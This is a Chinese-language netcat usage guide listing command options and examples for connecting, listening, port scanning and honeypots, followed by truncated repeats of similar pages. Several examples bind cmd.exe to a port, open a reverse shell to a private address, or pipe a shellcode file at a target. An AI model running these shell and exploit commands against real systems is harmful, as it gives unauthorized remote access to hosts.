netcat被譽為網路安全界的『瑞士軍刀』,相信沒有什麼人不認識它吧......
乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路連線,還有幾個很有意思的內建功能(詳情請看下面的使用方法)。
在中國,它的windows版有兩個版本,乙個是原創者chris wysopal寫的原版本,另乙個是由『紅與黑』編譯後的新『濃縮』版。『濃縮』版的主程式只有10多kb(10多kb的nc是不能完成下面所說的第4、第5種使用方法,有此功能的原版nc好象要60kb:p),雖然「體積」小,但很完成很多任務作。
軟體介紹:
類別:開放原始碼
平台:linux/bsd/unix/windows
windows下版本號:[v1.10 nt]
引數介紹:
nc.exe -h即可看到各引數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 後台模式
-e prog程式重定向,一旦連線,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h幫助資訊
-i secs延時的間隔
-l監聽模式,用於入站連線
-l連線關閉後,仍然繼續監聽
-n指定數字的ip位址,不能用hostname
-o file記錄16進製制的傳輸
-p port本地埠號
-r隨機本地及遠端埠
-s addr本地源位址
-t使用telnet互動方式
-u udp模式
-v詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z將輸入輸出關掉--用於掃瞄時
埠的表示方法可寫為m-n的範圍格式。
基本用法:
大概有以下幾種用法:
1)連線到remote主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的tcp80埠
2)監聽local主機,例子:
格式:nc -l -p 80
講解:監聽本機的tcp80埠
3)掃瞄遠端主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃瞄192.168.x.x的tcp80到tcp445的所有埠
4)remote主機繫結shell,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:繫結remote主機的cmdshell在remote主機的tcp5354埠
5)remote主機繫結shell並反向連線,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:繫結remote主機的cmdshell並反向連線到192.168.x.x的tcp5354埠
以上為最基本的幾種用法(其實nc的用法還有很多,
當配合管道命令「|」與重定向命令「<」、「>」等等命令功能更強大......)。
高階用法:
6)作攻擊程式用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連線到192.168.x.x的80埠,並在其管道中傳送c:exploit.txt的內容(兩種格式確有相同的效果,真是有異曲同工之妙:p)
附:c:exploit.txt為shellcode等
7)作蜜罐用[1],例子:
格式:nc -l -p 80
講解:使用-l(注意l是大寫)可以不停地監聽某乙個埠,直到ctrl+c為止.
8)作蜜罐用[2],例子:
格式:nc -l -p 80 > c:log.txt
講解:使用-l可以不停地監聽某乙個埠,直到ctrl+c為止,同時把結果輸出到c:log.txt中,如果把『>』改為『>>』即可以追加日誌。
附:c:log.txt為日誌等
9)作蜜罐用[3],例子:
格式1:nc -l -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -l -p 80
講解:使用-l可以不停地監聽某乙個埠,直到ctrl+c為止,並把c:honeypot.txt的內容『送』入其管道中。
NC瑞士軍刀的具體使用方法
nc的使用方法 netcat被譽為網路安全界的 瑞士軍刀 相信沒有什麼人不認識它吧.乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路...
瑞士軍刀 NC用法
瑞士軍刀 nc.exe 引數說明 h 檢視幫助資訊 d 後台模式 e prog程式重定向,一但連線就執行 危險 i secs延時的間隔 l 監聽模式,用於入站連線 l 監聽模式,連線天閉後仍然繼續監聽,直到ctr c n ip位址,不能用網域名稱 o film記錄16進製制的傳輸 p 空格 埠 本地...
nc瑞士軍刀的引數
d 後台模式 e prog 程式重定向,一旦連線,就執行 危險 g gateway source routing hop point s up to 8 g num source routing pointer 4,8,12,h 幫助資訊 i secs 延時的間隔 l 監聽模式,用於入站連線 l 連...